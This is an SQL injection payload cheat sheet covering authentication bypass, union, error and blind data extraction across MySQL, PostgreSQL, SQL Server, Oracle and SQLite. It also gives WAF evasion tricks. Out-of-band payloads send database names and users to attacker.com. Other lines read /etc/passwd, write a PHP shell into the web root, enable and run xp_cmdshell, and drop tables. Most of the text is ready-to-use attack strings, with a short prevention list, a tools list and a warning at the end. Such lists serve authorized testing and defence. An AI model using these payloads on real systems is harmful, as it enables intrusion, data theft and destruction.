SQL Injection Payloads
SQL Injection (SQLi) is a code injection technique that exploits security vulnerabilities in an application's database layer. Attackers can manipulate SQL queries to access, modify, or delete data, bypass authentication, and execute administrative operations.
Types of SQL Injection
In-Band SQLi
Results are directly returned in the application's response (Union-based, Error-based).
Inferential (Blind) SQLi
No direct data output; attackers infer information through application behavior (Boolean-based, Time-based).
Out-of-Band SQLi
Attacker receives data through a different channel (DNS, HTTP requests to external server).
Authentication Bypass
Basic Bypass Payloads
' OR '1'='1
' OR '1'='1' --
' OR '1'='1' #
' OR '1'='1'/*
admin' --
admin'#
admin'/*
' OR 1=1--
' OR 1=1#
' OR 1=1/*
') OR ('1'='1
') OR ('1'='1'--
') OR ('1'='1'#
Advanced Bypass
' OR 'x'='x
' OR 'something' LIKE 'some%
admin' OR '1'='1' --
' OR 1--'
' OR 1#'
' OR '1'='1' LIMIT 1--
' UNION SELECT NULL, NULL WHERE '1'='1' --
' UNION SELECT 'admin', 'password' WHERE '1'='1' --
Without Quotes
admin' OR 1=1 OR 'a'='a
' OR 1=1 --
' OR 1=1 #
' OR 1=1 /*
Union-Based SQL Injection
UNION queries combine results from multiple SELECT statements.
Finding Number of Columns
' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3--
...continue until error
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
...continue until query works
Data Extraction
' UNION SELECT username, password FROM users--
' UNION SELECT NULL, username || '~' || password FROM users--
' UNION SELECT table_name, NULL FROM information_schema.tables--
' UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_name='users'--
Enumerate Database Information
-- MySQL
' UNION SELECT NULL, database()--
' UNION SELECT NULL, version()--
' UNION SELECT NULL, user()--
' UNION SELECT NULL, @@hostname--
-- PostgreSQL
' UNION SELECT NULL, current_database()--
' UNION SELECT NULL, version()--
' UNION SELECT NULL, current_user--
-- SQL Server
' UNION SELECT NULL, DB_NAME()--
' UNION SELECT NULL, @@version--
' UNION SELECT NULL, SYSTEM_USER--
-- Oracle
' UNION SELECT NULL, user FROM dual--
' UNION SELECT NULL, version FROM v$instance--
Error-Based SQL Injection
Extract data through database error messages.
MySQL
' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT database()),0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)y)--
' AND extractvalue(1,concat(0x7e,(SELECT database())))--
' AND updatexml(null,concat(0x7e,(SELECT database())),null)--
' OR 1 GROUP BY CONCAT_WS(0x3a,version(),database(),user()) HAVING MIN(0)--
SQL Server
' AND 1=CONVERT(INT,(SELECT @@version))--
' AND 1=CAST((SELECT @@version) AS INT)--
PostgreSQL
' AND CAST((SELECT version()) AS INT)=1--
' AND 1::int=(SELECT version())::text::int--
Oracle
' AND CTXSYS.DRITHSX.SN(1,(SELECT user FROM dual))=1--
' AND 1=CTXSYS.DRITHSX.SN(1,(SELECT banner FROM v$version WHERE rownum=1))--
Blind SQL Injection
Boolean-Based
-- True condition
' AND 1=1--
-- False condition
' AND 1=2--
-- Character-by-character extraction
' AND SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)='a'--
' AND ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1))=97--
-- Length discovery
' AND LENGTH((SELECT password FROM users WHERE username='admin'))=8--
Conditional Responses
' AND (SELECT COUNT(*) FROM users WHERE username='admin' AND password LIKE 'a%')=1--
' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin')='a'--
Time-Based Blind SQL Injection
Infer data by observing response times.
MySQL
' AND SLEEP(5)--
' AND IF(1=1,SLEEP(5),0)--
' AND IF(SUBSTRING((SELECT database()),1,1)='a',SLEEP(5),0)--
' OR IF(ASCII(SUBSTRING((SELECT database()),1,1))>97,SLEEP(5),SLEEP(0))--
SQL Server
'; WAITFOR DELAY '00:00:05'--
'; IF (1=1) WAITFOR DELAY '00:00:05'--
'; IF (SELECT USER)='sa' WAITFOR DELAY '00:00:05'--
PostgreSQL
'; SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END--
' OR (SELECT CASE WHEN (SELECT current_database())='target' THEN pg_sleep(5) ELSE pg_sleep(0) END) IS NOT NULL--
Oracle
' AND DBMS_LOCK.SLEEP(5)--
' OR (SELECT CASE WHEN (SELECT user FROM dual)='SYSTEM' THEN DBMS_LOCK.SLEEP(5) ELSE NULL END FROM dual) IS NOT NULL--
Out-of-Band SQL Injection
DNS Exfiltration
MySQL (Windows):
' UNION SELECT LOAD_FILE(CONCAT('\\\\',(SELECT database()),'.attacker.com\\a'))--
SQL Server:
'; EXEC master..xp_dirtree '\\\\'+@@version+'.attacker.com\\a'--
'; DECLARE @q VARCHAR(1024); SET @q='\\\\'+DB_NAME()+'.attacker.com\\a'; EXEC master..xp_dirtree @q--
Oracle:
' UNION SELECT UTL_HTTP.REQUEST('http://attacker.com/'||(SELECT user FROM dual)) FROM dual--
' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://attacker.com/'||(SELECT user FROM dual)||'"> %remote;]>'),'/l') FROM dual--
HTTP Requests
SQL Server:
'; EXEC master..xp_cmdshell 'nslookup attacker.com'--
PostgreSQL:
' UNION SELECT NULL, content FROM pg_read_file('network://attacker.com/file')--
Second-Order SQL Injection
Malicious payload is stored and executed later.
-- First request (Registration)
username: admin'--
email: test@example.com
-- Second request (Profile update using stored username)
-- The stored username "admin'--" is used unsafely in an UPDATE query
Database-Specific Payloads
MySQL
-- Version
' UNION SELECT NULL, @@version--
-- Current User
' UNION SELECT NULL, user()--
-- Database Name
' UNION SELECT NULL, database()--
-- Tables
' UNION SELECT NULL, table_name FROM information_schema.tables WHERE table_schema=database()--
-- Columns
' UNION SELECT NULL, column_name FROM information_schema.columns WHERE table_name='users'--
-- File Reading
' UNION SELECT NULL, LOAD_FILE('/etc/passwd')--
-- File Writing
' UNION SELECT NULL, 'shell code' INTO OUTFILE '/var/www/html/shell.php'--
-- Command Execution (UDF)
'; SELECT sys_exec('whoami')--
PostgreSQL
-- Version
' UNION SELECT NULL, version()--
-- Current User
' UNION SELECT NULL, current_user--
-- Database Name
' UNION SELECT NULL, current_database()--
-- Tables
' UNION SELECT NULL, tablename FROM pg_tables WHERE schemaname='public'--
-- Columns
' UNION SELECT NULL, column_name FROM information_schema.columns WHERE table_name='users'--
-- File Reading
' UNION SELECT NULL, pg_read_file('/etc/passwd',0,200)--
-- Command Execution
'; COPY (SELECT '') TO PROGRAM 'whoami'--
SQL Server
-- Version
' UNION SELECT NULL, @@version--
-- Current User
' UNION SELECT NULL, SYSTEM_USER--
-- Database Name
' UNION SELECT NULL, DB_NAME()--
-- Tables
' UNION SELECT NULL, name FROM sys.tables--
-- Columns
' UNION SELECT NULL, name FROM sys.columns WHERE object_id=OBJECT_ID('users')--
-- Command Execution
'; EXEC xp_cmdshell 'whoami'--
-- Enable xp_cmdshell
'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;--
Oracle
-- Version
' UNION SELECT NULL, banner FROM v$version--
-- Current User
' UNION SELECT NULL, user FROM dual--
-- Tables
' UNION SELECT NULL, table_name FROM all_tables--
-- Columns
' UNION SELECT NULL, column_name FROM all_tab_columns WHERE table_name='USERS'--
-- Privilege Escalation
' UNION SELECT NULL, granted_role FROM user_role_privs--
SQLite
-- Version
' UNION SELECT NULL, sqlite_version()--
-- Tables
' UNION SELECT NULL, name FROM sqlite_master WHERE type='table'--
-- Schema
' UNION SELECT NULL, sql FROM sqlite_master WHERE type='table' AND name='users'--
-- Columns (via pragma)
' UNION SELECT NULL, name FROM pragma_table_info('users')--
WAF Evasion Techniques
Whitespace Manipulation
'/**/OR/**/1=1--
'/*!OR*/1=1--
'+OR+1=1--
'%0aOR%0a1=1--
'%09OR%091=1--
'%0dOR%0d1=1--
Case Variation
' Or 1=1--
' oR 1=1--
' UnIoN SeLeCt--
Comment Injection
'/**/UNION/**/SELECT--
'UN/**/ION/**/SE/**/LECT--
'UNI%00ON SEL%00ECT--
Encoding
-- URL Encoding
%27%20OR%20%271%27%3D%271
%27%20UNION%20SELECT--
-- Double URL Encoding
%2527%2520OR%2520%25271%2527%253D%25271
-- Unicode
\u0027 OR \u0031=\u0031--
-- Hex Encoding
0x27204f5220312=31--
Alternative Syntax
' || '1'='1
' OR 1 LIKE 1--
' OR 1 REGEXP 1--
' OR 1 BETWEEN 0 AND 2--
' OR 'a'<>'b'--
Null Byte
'%00 OR 1=1--
' OR%001=1--
Scientific Notation
' OR 1e0=1--
' OR 0x1=1--
Stacked Queries
Execute multiple SQL statements.
MySQL / SQL Server
'; DROP TABLE users--
'; INSERT INTO users (username, password) VALUES ('hacker', 'password')--
'; UPDATE users SET password='hacked' WHERE username='admin'--
'; EXEC xp_cmdshell('whoami')--
PostgreSQL
'; DROP TABLE users CASCADE--
'; CREATE TABLE evil AS SELECT * FROM users--
'; COPY (SELECT '') TO PROGRAM 'whoami'--
Advanced Techniques
Routed SQL Injection
-- Exploiting second-order injection through stored procedures
CALL update_user_profile('admin''--', 'new_email@example.com');
JSON/XML SQL Injection
{
"username": "admin' OR '1'='1'--",
"password": "anything"
}
Encrypted Payload
-- Base64 encoded
' UNION SELECT FROM_BASE64('c2VsZWN0IHVzZXIoKQ==')--
Polyglot SQL Injection
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
Prevention Best Practices
- Prepared Statements / Parameterized Queries: Use bound parameters instead of string concatenation
- Stored Procedures: Encapsulate SQL logic (ensure they don't use dynamic SQL)
- Input Validation: Whitelist allowed characters and patterns
- ORM Frameworks: Use Object-Relational Mapping tools properly
- Least Privilege: Database users should have minimal necessary permissions
- WAF: Implement Web Application Firewalls with updated rules
- Error Handling: Don't expose detailed SQL errors to users
- Escaping: Escape special characters (last resort, prefer parameterization)
Testing Tools
- SQLMap - Automated SQL injection tool
- jSQL Injection - Java-based SQL injection tool
- Havij - Automated SQL injection tool
- Burp Suite - Web application security testing
- OWASP ZAP - Security scanner
- NoSQLMap - For NoSQL injection testing
⚠️ Warning: These payloads are for educational and authorized security testing purposes only. Unauthorized use is illegal and punishable by law.